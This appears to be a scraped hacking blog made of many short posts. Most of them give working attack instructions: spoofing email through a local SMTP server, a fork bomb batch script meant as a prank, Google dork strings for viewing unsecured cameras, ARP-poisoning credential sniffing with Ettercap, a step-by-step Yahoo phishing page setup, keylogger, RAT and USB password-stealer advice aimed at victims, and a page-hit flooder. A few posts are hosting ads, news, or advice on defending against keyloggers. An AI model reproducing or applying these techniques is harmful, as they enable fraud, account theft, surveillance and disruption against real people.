How to send fake email / Email Forging

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorized access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1?

4. Set port to “25?

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer.This step is very important to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3. Click on it to enlarge

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.

220 Welcome to QK SMTP Server 3

helo hacker (Type helo & any name followed by space)

250 Hello hacker (Server Welcomes You)

mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)

250 billg@microsoft.com Address Okay (Server gives a positive response)

rcpt to:admin@gmail.com (Type any valid recipient email address)

250 admin@gmail.com Address Okay (Server gives a positive response)

data (type this command to start input data)

354 Please start mail input

From:Gates <billg@microsoft.com>

To:admin@gmail.com

Date:Sat Jan 5,2008 9:45 PM

Subject:Test to send fake email

You can create as many headers followed by the “:” symbol.

NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the email is ready for sending)

quit (Type this command to quit from server)

221 Closing connection. Good bye.

Connection to host lost

(You will get the above 2 lines of message after typing “quit” command)

(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****

Read More

How to make a Fork Bomb (Rabbit Virus)

Introduction

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!

Read More

How to make a Virus File Undetected By Antivirus Programs

This video tutorial explains you in detail “how to make an infected file undetectable” just by doing some splitting and hexing!!

Read More

How to Hack into a Live Security Camera

Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just google these following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:

• inurl:”CgiStart?page=”


• inurl:/view.shtml


• intitle:”Live View / – AXIS


• inurl:view/view.shtml


• inurl:ViewerFrame?Mode=


• inurl:ViewerFrame?Mode=Refresh


• inurl:axis-cgi/jpg


• inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)


• inurl:view/indexFrame.shtml


• inurl:view/index.shtml


• inurl:view/view.shtml


• liveapplet


• intitle:”live view” intitle:axis


• intitle:liveapplet


• allintitle:”Network Camera NetworkCamera” (disconnected)


• intitle:axis intitle:”video server”


• intitle:liveapplet inurl:LvAppl


• intitle:”EvoCam” inurl:”webcam.html”


• intitle:”Live NetSnap Cam-Server feed”


• intitle:”Live View / – AXIS”


• intitle:”Live View / – AXIS 206M”


• intitle:”Live View / – AXIS 206W”


• intitle:”Live View / – AXIS 210?


• inurl:indexFrame.shtml Axis


• inurl:”MultiCameraFrame?Mode=Motion” (disconnected)


• intitle:start inurl:cgistart


• intitle:”WJ-NT104 Main Page”


• intitle:snc-z20 inurl:home/


• intitle:snc-cs3 inurl:home/


• intitle:snc-rz30 inurl:home/


• intitle:”sony network camera snc-p1?


• intitle:”sony network camera snc-m1?


• site:.viewnetcam.com -www.viewnetcam.com


• intitle:”Toshiba Network Camera” user login


• intitle:”netcam live image” (disconnected)


• intitle:”i-Catcher Console – Web Monitor”

Happy Cam Hacking Guys!!

Read More

Sniffing Tutorial

Hi, Today I am posting a tutorial on Sniffing which can be done using “BACKTRACK” . You can download Backtrack from here.

I prefer using Backtrack 3.0 Final version.

Well lets start with sniffing. If you don’t know what sniffing is, then click here.

Tools you need are:

Ettercap

nano

1. For SSL Dissection support (hotmail,gmail), you need to do this:

Open a shell, type: “nano /usr/local/etc/etter.conf”, use the down arrow until you reach “redir_command_on/off”, look at the linux part, your gonna need to uncomment:

Code:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to:

Code:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

after your done, press F2, Y, Return.

Now boot Ettercap: Menu –> Backtrack –> Spoofing –> Ettercap

Go to: Sniff –> Unified Sniffing –>ethX(what interface you want to sniff).

Then Press: Ctrl+S to scan hosts.

Then Go to: Mitm –> ARP poisoning, select sniff remote connections, and press ok.

Then Go to: Start –> Start Sniffing.

For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.

When your done, go to Start –> Stop Sniffing, And go to Mitm –> Stop mitm attack(s)

Read More

Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

Internet definitely has several unheard places also known as underground websites, few of these website offer users 100s and 1000s of softwares, games, movies and lot of Hacking Stuff for downloads. Though these sites are pretty tough to find, I was able to unearth more than 50+ FTP sites that allow users to download softwares, games, movies and lot of Hacking tools for free.

Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.

1. ftp://ftp.freenet.de/pub/filepilot/

2. ftp://193.43.36.131/Radio/MP3/

3. ftp://195.216.160.175/

4. ftp://207.71.8.54:21/games/

5. ftp://194.44.214.3/pub/music/

6. ftp://202.118.66.15/pub/books

7. ftp://129.241.210.42/pub/games/

8. ftp://clubmusic:clubmusic@217.172.16.3:8778/

9. ftp://212.174.160.21/games

10. ftp://ftp.uar.net/pub/e-books/

11. ftp://129.241.210.42/pub/games/

12. ftp://193.231.238.4/pub/

13. ftp://207.71.8.54/games/

14. ftp://194.187.207.98/video/

15. ftp://194.187.207.98/music/

16. ftp://194.187.207.98/soft/

17. ftp://194.187.207.98/games/

18. ftp://ftp.uglan.ck.ua/

19. ftp://159.153.197.74/pub

20. ftp://leech:l33ch@61.145.123.141:5632/

21. ftp://psy:psy@ftp.cybersky.ru

22. ftp://130.89.175.1/pub/games/

23. ftp://194.44.214.3/pub/

24. ftp://195.116.114.144:21/

25. ftp://64.17.191.56:21/

26. ftp://80.255.128.148:21/pub/

27. ftp://83.149.236.35:21/packages/

28. ftp://129.241.56.118/

29. ftp://81.198.60.10:21/

30. ftp://128.10.252.10/pub/

31. ftp://129.241.210.42/pub/

32. ftp://137.189.4.14/pub

33. ftp://139.174.2.36/pub/

34. ftp://147.178.1.101/

35. ftp://156.17.62.99/

36. ftp://159.153.197.74/pub/

37. ftp://193.140.54.18/pub/

38. ftp://192.67.63.35/

39. ftp://166.70.161.34/

40. ftp://195.161.112.15/musik/

41. ftp://195.161.112.15/

42. ftp://195.131.10.164/software

43. ftp://195.146.65.20/pub/win/

44. ftp://199.166.210.164/

45. ftp://195.46.96.194/pub/

46. ftp://61.136.76.236/

47. ftp://61.154.14.248/

48. ftp://62.210.158.81/

49. ftp://62.232.57.61/

50. ftp://212.122.1.85/pub/software/

51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

Read More

Top 10 Facebook Hacks

Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.

1.How to View the Album of Any User Even if it is Private

You can use this script to view a photo in the original album, even if you’re not friends with the person.

Get it Here

2. How to Remove Annoying Facebook Advertisement

Get rid of some of the Facebook advertising and sponsored by sections with this tool.

Get it Here

3. How to see Real Profiles from Public Pages

This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.

Get it Here

4. How to Undo Facebook Changes

If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.

Get it Here

5. How to View All the Photos from a Person

You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.

Get it Here

6. How to Find More Friends at Facebook

Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.

Get it Here

7. How to Share Files from Facebook

With this box widget, you can share files from your computer through Facebook. Isn’t it great?

Get it Here

8. How to Get a Job from Facebook

Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.

Get it Here

9. How to Tighten up the Privacy and still Maintain Communication Convenience

The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.

Get it Here

10 How to Cheat Facebook Texas Hold em Poker

This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.

Get it Here

Read More

Reveal hidden passwords under asterisks for free

College labs, Cyber cafes are a good source of saved passwords. People either save their passwords unknowingly sometimes as the “Remember my password” is checked by default or when the settings of the browser are set to saving the password automatically.

Accessing their email accounts, social networking profiles etc becomes easier but most of the times its difficult to change or know those passwords as they are under asterisks and changing the password required you to enter the old password.

This is where Asterisk Key comes in handy. Its a free software which shows you the password behind asterisks in the ACTIVE INTERNET EXPLORER window. It however, doesn’t work in firefox or chrome but only Internet Explorer.

Download Asterisk Key (454KB)

Stay tuned as I’ll post on how to use Asterisk Key and retrieve MTNL broadband internet password of any user.

Read More

Phishing Tutorial: Explained stepwise

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT Administrators are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake.

Read more for the Phishing Tutorial

Now i am going to explain you “How to do phishing?”

Steps are indicated as follows:-

Step 1- Firstly you must signup for a free web hosting service like:

www.freehostia.com

www.ripway.com etc….. and register a domain or subdomain.

After getting your signup done, you have your own subdomain like for instance you registered with freehostia, then your domain is like “www.yourname.freehostia.com”

Step 2- Now Login to your freehostia account and go to “File Manager” in the freehostia control panel.

Step 3- Now what you have to do is, go to your domain folder like “yourname.freehostia.com” and create a separate folder in that directory with the name of the site, for eg. yahoo , if you want to phish a yahoomail account!

Step 4- Click here to Download the compressed file and extract it to your desktop:

and then open your “yahoomail” folder. You’ll find two files there viz. “bhanu.php” & “index.htm” [ Each phisher folder contains same files]

Step 5- Now upload “bhanu.php” & “index.htm” to the “yahoo” folder you created inside “yourname.freehostia.com”

So when you’re done with the uploading part, the link to your yahoo phisher is “www.yourname.freehostia.com/yahoo/index.htm”.

Step 6- Congrats!! That is your Yahoomail phisher!! Now all you have to do is copy the link to the phisher file i.e.”www.yourname.freehostia.com/yahoo/index.htm” and send it to the victim you want to hack! When he/she’ll open that link, it’ll be directed to your yahoo phisher and when he/she logins that page he/she’ll be redirected to the original “YahooMail” website and you’ll get the password in the “passes.txt” file which will be created in tha yahoo folder you created in your freehostia domain and the path to that file will be “www.yourname.freehostia.com/yahoo/passes.txt” !

IMPORTANT NOTE: CHANGE YOUR FREEHOSTIA DIRECTORY PERMISSION TO “755” SO THAT NO ONE CAN ACCESS YOUR PERSONAL FILES EXCEPT THE PHISHER LOGIN PAGE!!

**FOR EDUCATIONAL PURPOSES ONLY!**

Read More

How do The Crackers Crack IM, E-Mail and other accounts?

The most frequent questions asked by many people especially in a chat room is How To Hack Yahoo Password or any other email account.So you as the reader are most likely reading this because you want to break into somebody’s email account.Here are some of the tricks that can be used to track an email password.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING



There is no program that will crack the password of victim’s account.There exist many password hacking programs which claims to do this,but unfortunately people using these kind of programs will only end up in frustration.

None of these programs work since services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts.Another thing you must know if you ask this question in any “hacker” chat room/channel, you hear that you have to email some address and in any way you give up your password in the process, in attempt to crack others password.So DO NOT BELEIVE THIS.

TWO WAYS OF HACKING METHODS THAT YOU CAN TRY



IF YOU HAVE ACCESS TO VICTIM’S COMPUTER



If you have physical access to victim’s computer then it’s definitely possible to crack his password.This can easily be done by just installing a keylogger.

What is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard.

A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.OK we can crack passwords using a keylogger but these are the questions that arise in our mind now!

1.Where is the keylogger program available?

A keylogger program is widely available on the internet.some of them are listed below

Powered Keylogger

Advanced keylogger

Elite Keylogger

Handy Keylogger

Quick Keylogger

Oops i think the above list is enough.There exists hundreds of such keyloggers available on the net.These are software keyloggers.There are also hardware Keyloggers available which can be directly attached to computer and can be used to sniff valuable data.These programs are none other than spyware! So use it @ your own risk.

2.How to install it?



You can install these keyloggers just as any other program but these things you must keep in mind.While installing,it asks you for a secret password and a hot key to enable it.This is because after installing the keylogger program is completely hidden and the victim can no way identify it.Keylogger is hidden from control panel,Program files,Start menu,Task manager so that it becomes completely invisible but runs in background monitoring the user activities.

3.Once installed how to get password from it?



The hacker can open the keylogger program by just pressing the hot keys(which is set during installation) and enter the password.Now it shows the logs containing every keystroke of the user,where it was pressed,at what time,including screenshots of the activities.

Some keyloggers also has a built in SMTP server.So once you install the keylogger on victim’s computer you can just sit back in our place and receive the logs via email

4.Which keylogger program is the best?

According to me Elite Keylogger and Powered keylogger are the best.You can also read the features and side by side comparisions of them and select the best that suites your needs.

IF YOU DO NOT HAVE ACCESS TO VICTIM’S COMPUTER



Ofcourse the above method can only be employed if you can access victims computer.But what to do if we do not have access.In this case there exists many Remote Administration Tools commonly known as RATs available on net.Just try googling and you can get one.

OTHER WAYS OF HACKING PASSWORD

The other most commonly used trick to sniff password is using Fake Login Pages or Phishers.

This is where many people get cheated.A Fake Login page or a Phisher is a page that appears exactly as a Login page but once we enter our password there ,we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & password) are redirected to remote server and we get an error “Page cannot be displayed”.Many times we ignore this but finally we loose our valuable data.

Read More

KeyLoggers: (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.
There are two types of keystroke loggers:
1. Software based and
2. Hardware based.

Read more about keyloggers….

Spy ware: Spector (http://www.spector.com/)

• Spector is a spy ware and it will record everything anyone does on the internet.


• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.


• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.

Hacking Tool: (Software KeyLogger) eBlaster (http://www.spector.com/)

 

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

 

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

• The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.


• It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Read More

USB Password Stealer: USB Steals Pc Passwords

Tweaked USB that steals every password including licenses.

Instructions

1.Download and Decompress the rar file and put all the files located in the folder “USBThief” into a USB. (You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply copy and paste)

2.Insert the USB in your victim’s computer.

3.View folder “dump” to see the passwords. It also makes a second dump folder in the batexe folder. Tested and Working perfectly!

No Password in the USBThief.rar file.

Can be detected by some anti virus programs!!

Read More

Page Hits Flooder: Increase your page hits by flooding

This small program can flood your page hits.

but you have to dedicate one browser for it.. like internet explorer

Read more to know the method..

method:

make a batch file with these lines

@echo off

:1

start C:Progra~1Intern~1iexplore.exe “http://yoursite.com“

ping -n 10 127.0.0.1 >nul

taskkill.exe /im iexplore.exe

goto 1

depending upon your net speed u may increase the 10 secs time wait

with 10 sec time u may have 360 hits in an hour

with 5 sec time u may have 720 hits in an hour

Read More

Hostmonster Coupon Review

Do you want a Hostmonster Coupon?

As most of you are aware (or not who knows), Hostmonster.Com is a sister company of Bluehost. If you like Bluehost or have seen their services recommended, then you will be happy to know that Hostmonster offers the same great service. Moolahology is happy to help you make the right choice when it comes to web hosting.

Why do you save with Hostmonster? Let’s look at some of the facts…

Using the coupon link in the first paragraph, you are only going to pay a measly $3.95 per month. That is almost half the cost of most of the major hosting networks. After all, Hostmonster isn’t going to cut down on quality simply because the price is a little lower. On top of that, you also get a free domain name with unlimited domain hosting, plus an unlimited amount of Gigs for site transer. That’s service you can depend on.

Hostmonster has a reliable track record too. You won’t find very many unhappy people that used their hosting. You will always find someone who is unhappy with a company, that’s just the facts of life. What you want to make sure on is whether or not there is a large portion of unsatisfied folks. If there isn’t, that’s good news.

Another good reason to use Hostmonster is that they offer their customer quad core processing servers. If you know anything about web hosting, it is that CPU power generally is used before more Ram on a server – depending of course on the clients needs. In this case, since it is shared hosting, top notch CPUs are what is used. Not to bad huh?

They are known to keep on top of their updates and as such, always have the latest version of PHP etc… and they even give a SSL secure server for those of you wishing to run an e-commerce operation. That’s a sweet bang for the buck, especially at $3.95 a month. Where else can you get all of these goodies?

Now I know you can go anywhere for web hosting, but why not use the Hostmonster coupon I gave you? Heck you can always refund if you don’t like them. The reason I put this article together is for other people’s benefit. I’m not blowing hot air here (well typing not speaking I suppose) for nothing. Get yourself a reliable webhost today. Sign up with Hostmonster below or find another provider – either web, the web awaits you.

If you have any questions, feel free to give me a shout. I’m always on this site and if I see you wrote a question I’ll be happy to help in any way I can. Well, you can always give a shout out even if you don’t have a question about Hostmonster of their hosting packages. All the best in your web journeys.

Read More

PickaWeb Review

They provide first class internet services. They are experts in their field and they are dedicated to being the best.

That is why thousands of people and businesses have joined them since the year 2000. Their friendly & experienced staff are standing by, 24 hours a day, should you have any questions.

Formed in 2000 Pickaweb is one of the pioneers of UK web hosting.

Wholly owned by their original team, Pickaweb has demonstrated consistent growth in the subsequent period by offering low cost, high quality domain & hosting services.

By concentrating on the Small to Medium Sized Enterprise (SME) market Pickaweb has established itself as a key player in this market by maintaining a high value offering in terms of service & reliability through our relationships with major suppliers such as Tucows & CPanel.

Their services are backed up by their friendly & knowledgeable 24 hour support team who are at hand to support you via phone, live chat or email.

Products and services they offer include:

Web hosting: High quality web hosting services with 24×7 technical support via chat, phone and email.

All their packages come with the latest features including Cpanel control panel to manage your hosting account in real time.

Domain Name: Instant domain name registrations. They have registered thousands of domain names and are experts in the field.

They are pleased to assist you regarding any domain name queries you may have.

Read More

GPS Tracking Systems By LandAirSea

Those days are gone when GPS tracking had a scope only for the private detectives and businessmen. GPS Tracking is now made easy with the LandAirSea GPS Tracking systems. GPS has become a widely used aid to navigation worldwide. A GPS records the position of a certain thing and determines its location and it’s usually used in vehicle or asset tracking. LandSeaAir makes it even easier.

LandSeaAir provides us a passive tracking device which can automatically log a route information of any vehicle or object for up to 30 days. The tools from LandAirSea are even compatible with Google Earth. LandAirSea provides us tracking systems like “GPS Tracking Key Pro”, “GPS Tracking Key” and many more in the list which are very affordable too. On their website they also provide the demo of these systems and also can help you find the locations to buy these superb affordable GPS devices worldwide.

LandAirSea provides:

1. Passive GPS Tracking

2. Real Time GPS Tracking

3. GPS Tracking with Google Earth

4. Fleet Management

5. Vehicle Tracking

6. GPS Teen Tracking

And Yeah! You can buy the products online too. On the main website of LandAirSea, you can also find and read the testimonials written by it’s various customers and can read their experience with LandAirSea GPS Navigation Systems and services.

Read More

The Future security mobile botnets take over ipone just with A SMS

Today at the cybersecurity conference known as Black Hack, researchers Charlie Miller and Collin Mulliner will present an SMS exploit that could take over your iPhone with just one text. Once the phone is compromised, the hacker would have access to all the functions on the phone allowing them to send email, access your contacts, make phone calls, and of course, send text messages that would send the exploit to more devices.

This serious vulnerability (which apparently Apple sat on for over a month) is probably the first time that most people have heard of mobile phones being used to create botnets. However, this isn't the first sighting of a mobile phone hijacking attempt for the purpose of botnet creation - a similar exploit was discovered earlier this month. Does this mean we're on the verge of a new and dangerous trend: the creation of "zombie" phones?

The iPhone SMS Hack

According to Forbes, the SMS exploit being demonstrated at Black Hat today involves sending short, mostly invisible SMS bursts which would allow a potential hacker to entirely take over the phone. The only warning you would have to alert you to the hack would be a text messaging that contained a single square character. If you received something like that, your only recourse would be to turn the phone off immediately.

The researchers said they alerted Apple to this vulnerability over a month ago, but no patch has been released. Apple isn't returning calls requesting a comment, either.

The First Mobile Botnet?

Assuming the iPhone exploit described above was able to make it into the wild, it could effectively compromise all the unprotected iPhones in the world (which, in theory, would be all of them, if no patch is distributed). The hack would essentially turn the phones into "zombies" - a term usually used to refer to PCs compromised by a hack, virus, or trojan horse in order to do the bidding of a hacker. Along with other compromised PCs like them, this group of computers would form a botnet of "zombie" machines.

While botnets are common in the PC world - it's estimated that these machines are used to send anywhere from fifty to eighty percent of spam worldwide - botnets consisting of mobile phones are practically unheard of...or are they?

Earlier this month, Symantec revealed an SMS threat dubbed "Sexy Space" created using malware known as SymbOS.Exy.C, a revision of older variations also used to create similar threats. Using simple social engineering tactics, this hack involves sending SMS spam with names like "Sexy View," "Sexy Girl," and "Sexy Space" to encourage victims to click an included link in the text message.



This particular exploit, only found on Symbian-powered devices so far, is smart enough to end certain programs on the hijacked phone that would make it possible to manually end the threat. At first, the hack was only being seen in China, but later an English version was discovered in the Middle East.

What's most frightening about this particular threat is that it's controlled by a central server. That means hackers could control the attacked phones the same way hackers today control zombie PCs. This led the Symantec researchers to wonder if this was, in fact, the first case of a mobile botnet being spotted in the wild.

But My Phone Has Never Been Attacked!

Security researchers have been warning us about the upcoming mobile risks for some time and yet few people have ever actually had their phone compromised by malware, it seems. To date, mobile exploits have been few and far between and have had no major impact on the industry as a whole or on consumer confidence levels regarding these devices. Perhaps lulled into a false sense of security since mobile phones were once much more basic devices without internet access and data plans, most people don't even realize that their phone could be at risk of an attack.

In a paper released this past fall from the Georgia Tech Information Security Center, Tom Cross, a researcher with the IBM Internet Security Systems X-Force team was quoted as saying how surprised he was that there haven't been more attacks to date on smartphone devices like Apple's iPhone. However, he noted that "financial motivation and increased adoption will increase attacks to smartphones in the years to come. As more payment infrastructure gets placed on these devices, they will become a more attractive target."

In other words, mobile phones just aren't worth hacking yet. That will change once more financial transactions take place over phones, agreed Dave Amster, VP of security investigations at Equifax, in that same report. "Consumers are ordering credit reports from their Blackberrys, which puts valuable information at risk," he said.

Still, hacking the mobile platform will remain a challenge. According to Patrick Traynor, a computer science professor at Georgia Tech and member of GTISC, the lifecycle for mobile phones is much shorter than that of PCs. Most people buy a new mobile device every two years - a cycle which allows manufacturers to keep up with security design - and potentially stay ahead of hackers.

But if there's one thing we've all learned over the years, it's that you should never count out the hackers. If there's something to be gained by creating mobile botnets - beyond simply proving that it's possible to do so - then there's no doubt that hackers will attempt to create them.

Read More

How to scan a file for virus with out downloding it your computer

This is very help full website for those who wana check the files for virus with out downloading it to your own computer

Now a days most of the hacking tools and also some of the files that our trusted friends sends may contain keyloggers or virus .

NoVirusThanks, a website that offers free service to analyze your file with 22 AntiVirus Engines and will report back the analysis result :

it introduced a new feature to scan the website contain any files with virus or any miscellaneous software or any drive -by-download attacks

it can scan php,.html.,js, sites
the main advantage is it saves your bandwidth and also time but the main drawback is this can scan only files maximum of 20 mb

plzz comment if u know any nice services like this

Read More

How to analyze shellcode

Often in some exploit analysis we need to analyze the shellcode,what it does and how.There are many ways you can do it.but the most simple way is to use following link:

http://sandsprite.com/shellcode_2_exe.php

Just copy paste your shellcode and it will give you a exe containing shellcode.then you can simply run it in ollydebugger and step in. sometimes shellcode is encrypted using the XOR but that is very simple to decode.

Hope it helps ..

Read More

Google's new operating system to take on Microsoft

Google is developing a new operating system for laptop computers in its boldest challenge yet to Microsoft's control over people's computing experience.

The new operating system will run through Google's nine-month-old Web browser, Chrome, according to a post late Tuesday night on the Mountain View-based company's Web site.

Google plans to introduce the operating system during the second half of 2010.

The new operating system is being designed for "netbooks," a low-cost, less powerful breed of laptops that is becoming increasingly popular among consumers primarily interested in a having a computer to surf the Web.

The Chrome browser could threaten Microsoft's Windows system, which has been running most personal computers for the past two decades.

Read More

Batch File Programming E-Book Released Online

I am very happy to inform that the E-book on ‘Batch File Programming‘ authored by me is published on the Internet today. More over i have found 39 Reads with in 15 Minutes from the time of uploading in the popular Document uploading site www.scribd.com.

                                                  This book ‘Batch File Programming’ is written after experimenting and testing all the snippets covered in this book. Batch File Programming is a pretty old one, but i have found lot of books that haven’t covered the dark-side of the batch, which still remains untold. The ultimate goal of this book is to make the readers understand how it works, what are the limitations of the batch, what else is possible with a batch, constructing useful programs with various views, Creating a batch virus by mis-using the commands, creating a batch file to an executable and lot more. 

                     This book is aimed at novice to advanced programmer, No matter if you are new to programming, this would be the right drive to start with, since this book contains real time examples along with screenshots that really helps in a better understanding of the concept.

Batch File Programming

Due to more number of readers online for this book, scribd has awarded and added this book to its ‘HOT LIST‘, just within the 3 hours from the time of upload.

Even though I have enclosed the scribd link for reading this book online, i am enclsoing the Table of Contents here in this page for your kind review.

• Introduction


• Internal & External Commands


• Run Line Commands


• Batch Operators


• Basic Commands


• Environment Variables


• Looping Statements


• Conditional Statements


• Commands Associated with files and folders


• Network Troubleshooting commands


• Code snippets


• Virus Programming


• Converting Batch to Executable’s

Each of the category displayed in the table of contents has its own sub-categories along with lot of batch programs bundled with it.

If you want to read the book online, you can check with this Link

http://www.scribd.com/doc/15565801/Batch-File-Programming

or by Clicking Here

Read More

Think about your financial information, and personal emails that your account holds. Don’t risk being hacked. read the post  information and follow then  u will never get hacked even if ur account  got hacked u can get it back

now a days  most off  the email services like gmail and yahoo introduced the captcha system so old brute forcing method wont work   .

check the email hacking methods so that  you can defend from those attacks

the main steps  to  hack proof your email comes while registering the email accout

you must set up the secondary mail id and also the security question

Where did you meet your spouse?

What was the name of your first school?

Who was your childhood hero?

What is your favorite pastime?

What is your favorite sports team?

What is your father’s middle name?

What was your high school mascot?

What was your first car of bike?

What is your pet’s name?

For example, a pet’s name. Don’t write your real pet’s name. Invent one! so that no one can guess that  add some special characters to your password like @#$*^ ” these cant be recorded by most of the keyloggers

make the note of the security question  and the secondary id some where in your dairy.

keyloggers are  mostly responsible for steeling of the date both account passwords

Here are the best tools to  protect your information from being stolen.

Web Based On Screen Keyboards

Some website such as Citibank has an on-screen javascript keyboard which you can use your mouse to click the character. This way, you can avoid using your keyboard. There is no need to install anything because everything is loaded from the website. If you’d like to implement an on-screen keyboard on your website, please visit the links below.

1. JavaScript Virtual Keyboard by Dmitry Khudorozhkov.

2. Javascript VirtualKeyboard by WingedFox.

- In my opinion, WingedFox’s Javascript VirtualKeyboard is much better than Dmitry’s JVK.

Program On Screen Keyboards

If you want to use an on-screen keyboard on a website but the on-screen keyboard is not available, you can download and use program type of on-screen keyboard. Usually the on screen keyboard program is very small in size and free to use.

1. Neo’s SafeKeys

2. MiloSoft Virtual On Screen Keyboard

3. Click-N-Type virtual keyboard

4. Mouse Only Keyboard v1.4 (MOK)

Softwares:

1. QFX KeyScrambler

2. I Hate Keyloggers

3. SnoopFree Privacy Shield 1.0.5

4. MyPlanetSoft Anti-Keylogger v1.5

5. KL-Detector v1.3

6. PSMAntiKeyLogger

Read More

This is the first post on hacking and this is also the ultimate post that will teach you how to hack any email. After reading this post u can hack gmail, yahoomail, hotmail, aol mail

The following article is not only teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

You all are very lucky for reading this post in learnhacking.org, because i worked very hard about more than 3 months to learn this.

Getting started :

There are so many ways to hack emails depending on the victim
Hacking with Keyloggers
Hacking with Trojans
Usage of Fake pages

Keyloggers :

Installing the keylogger in the victim’s system records each and every keystroke (every keyborad button including symbols), its very easy if u have the physical acsess to his/her system and its a bit complicated when it comes in remote installation.

